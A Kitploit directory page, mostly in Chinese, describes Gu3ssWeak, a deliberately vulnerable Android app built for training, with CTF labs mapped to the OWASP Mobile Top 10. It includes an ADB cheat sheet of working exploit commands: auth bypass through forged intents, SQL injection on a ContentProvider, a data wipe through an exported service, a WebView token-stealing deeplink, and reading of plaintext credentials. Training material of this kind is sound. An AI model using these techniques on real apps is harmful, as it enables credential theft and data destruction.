Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Gu3ssWeak — 用于移动安全研究和漏洞赏金练习的故意存在漏洞的 Android 应用 - OWASP Mobile Top 10 | Kitploit
工具/GitHubGitHub/b4sith-sec/gu3ssweak
Android安全漏洞分析移动应用渗透测试Web应用程序漏洞利用CTF渗透测试移动安全学习与教育学习路径与课程实验室与实践
GitHubb4sith-sec/gu3ssweak

Gu3ssWeak

82169天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

用于移动安全研究和漏洞赏金练习的故意存在漏洞的 Android 应用 - OWASP Mobile Top 10

查看仓库

Gu3ssWeak

一个故意设计存在漏洞的 Android 应用程序,用于移动安全研究、漏洞赏金练习和 CTF 风格的学习。包含 21 个已记录的漏洞,映射到 OWASP Mobile Top 10。


快速开始

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

启动应用,逐个完成每个实验,捕获 flag,并在应用内的 CTF 记分板上提交它们。


实验类别

类别漏洞Flags
WebViewWV-01 至 WV-055
DeeplinkDL-01 至 DL-04, DL-CHAIN5
Auth / SQL InjectionSQL-011
Admin PanelAP-01 至 AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 至 BR-032
ServiceSV-01, SV-02a, SV-02b2
Network InterceptionNET-011
Banking / OTPOTP-011
LFILFI-011
StorageSTORE-011
XSSXSS-01, XSS-022

共 20 个 flag,另外还有一个捕获全部 flag 后授予的 master flag。


截图

实验列表CTF 记分板
lab

CTF 流程

  1. 打开应用——直接进入实验列表。
  2. 选择一个实验,利用该漏洞(通过 UI、ADB 或两者)。
  3. 每次成功利用都会自动捕获其 flag。
  4. 点击“Submit Flag”进行确认,或在“CTF Scoreboard”上查看进度。
  5. 捕获全部 18 个 flag 以解锁 master flag。

文档

  • ARCHITECTURE.md - 每个易受攻击组件内部的工作原理
  • MITIGATIONS.md - 针对每个漏洞的修复和补救指导,包括 LFI 到 RCE 的升级概念
  • SECURITY.md - 安全政策和负责任披露
  • CHECKSUMS.txt - 构建的 APK 的 SHA256 校验和

ADB 漏洞利用速查表

# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

Admin panel - bypass the "fixed" auth check via forged intent extra

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

ContentProvider grant bypass - parenthesis breakout escapes the single-row grant

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Watch for logged secrets
adb logcat | grep Gu3ssWeak

免责声明

本项目纯属教育目的。所有漏洞都是有意为之并已记录。此处展示的技术适用于真实应用,但请仅测试您拥有或已获授权测试的系统。完整免责声明和负责任披露指导请参见 SECURITY.md。

许可证

MIT - 参见 LICENSE。

下载工具